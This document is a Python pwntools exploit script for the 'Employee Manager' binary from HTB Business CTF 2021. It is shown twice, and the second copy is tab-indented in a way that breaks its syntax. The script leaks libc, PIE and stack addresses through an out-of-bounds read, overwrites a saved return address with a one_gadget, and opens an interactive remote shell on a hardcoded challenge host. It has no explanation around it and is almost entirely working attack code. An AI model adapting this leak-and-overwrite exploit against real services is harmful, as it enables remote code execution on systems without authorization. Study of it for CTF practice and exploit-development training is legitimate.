beched/simple-pwn.py

## simple-pwn.py
'''
Exploit for the "Employee Manager" pwning challenge
HTB Business CTF 2021
DeteAct (https://pentest.global/)
'''

import re

from pwn import *

if 0:
    #s = process('./manager', env={'LD_PRELOAD': './libc-2.31.so'})
    s = remote('localhost', 1337)
else:
    s = remote('142.93.35.92', 32313)

elf = ELF('./manager')

libc_start_main = 0x26FC0
one_gadget_offset = 0xe6c84 - 243 # wtf
main_offset = elf.symbols['main'] # 0x122f
puts_offset = elf.got['puts']

def leak(offset):
    s.send('1\n')

    s.recv(4096)
    s.send('%s\n' % offset)

    t = str(s.recv(4096))

    a = int(re.findall(r'Rate: (\d+)', t)[0])
    b = int(re.findall(r'week: (\d+)', t)[0])

    return a, b

s.recv(4096)

# LEAK LIBC

msb, lsb = leak(7) # libc start main

libc_offset = (msb << 32) + lsb - libc_start_main
print('LIBC: 0x%x' % libc_offset)
one_gadget = libc_offset + one_gadget_offset
print('1gadget: 0x%x' % one_gadget)

# LEAK PIE

msb, lsb = leak(11) # main

main = (msb << 32) + lsb
print('main: 0x%x' % main)
pie_offset = main - main_offset
print('PIE: 0x%x' % pie_offset)

# LEAK RSP

msb, lsb = leak(9) # some stack value

stack = (msb << 32) + lsb - 0x128 # observed in gdb
print('Stack: 0x%x' % stack)

# WRITE

s.send('2\n')
s.recv(4096)

#puts = pie_offset + puts_offset
#print('puts: 0x%x' % puts)

#where = (puts - stack) // 2
where = 7 # libc start main

s.send('%s\n' % where)
s.recv(4096)

what_lsb = one_gadget & 0xffffffff
what_msb = one_gadget >> 32

raw_input('PWN???')

s.send('%s\n' % what_lsb)
s.recv(4096)
s.send('%s\n' % what_msb)

s.send('3\n') # exit

s.interactive()
	'''
	Exploit for the "Employee Manager" pwning challenge
	HTB Business CTF 2021
	DeteAct (https://pentest.global/)
	'''

	import re

	from pwn import *

	if 0:
	#s = process('./manager', env={'LD_PRELOAD': './libc-2.31.so'})
	s = remote('localhost', 1337)
	else:
	s = remote('142.93.35.92', 32313)

	elf = ELF('./manager')

	libc_start_main = 0x26FC0
	one_gadget_offset = 0xe6c84 - 243 # wtf
	main_offset = elf.symbols['main'] # 0x122f
	puts_offset = elf.got['puts']

	def leak(offset):
	s.send('1\n')

	s.recv(4096)
	s.send('%s\n' % offset)

	t = str(s.recv(4096))

	a = int(re.findall(r'Rate: (\d+)', t)[0])
	b = int(re.findall(r'week: (\d+)', t)[0])

	return a, b

	s.recv(4096)

	# LEAK LIBC

	msb, lsb = leak(7) # libc start main

	libc_offset = (msb << 32) + lsb - libc_start_main
	print('LIBC: 0x%x' % libc_offset)
	one_gadget = libc_offset + one_gadget_offset
	print('1gadget: 0x%x' % one_gadget)

	# LEAK PIE

	msb, lsb = leak(11) # main

	main = (msb << 32) + lsb
	print('main: 0x%x' % main)
	pie_offset = main - main_offset
	print('PIE: 0x%x' % pie_offset)

	# LEAK RSP

	msb, lsb = leak(9) # some stack value

	stack = (msb << 32) + lsb - 0x128 # observed in gdb
	print('Stack: 0x%x' % stack)

	# WRITE

	s.send('2\n')
	s.recv(4096)

	#puts = pie_offset + puts_offset
	#print('puts: 0x%x' % puts)

	#where = (puts - stack) // 2
	where = 7 # libc start main

	s.send('%s\n' % where)
	s.recv(4096)

	what_lsb = one_gadget & 0xffffffff
	what_msb = one_gadget >> 32

	raw_input('PWN???')

	s.send('%s\n' % what_lsb)
	s.recv(4096)
	s.send('%s\n' % what_msb)

	s.send('3\n') # exit

	s.interactive()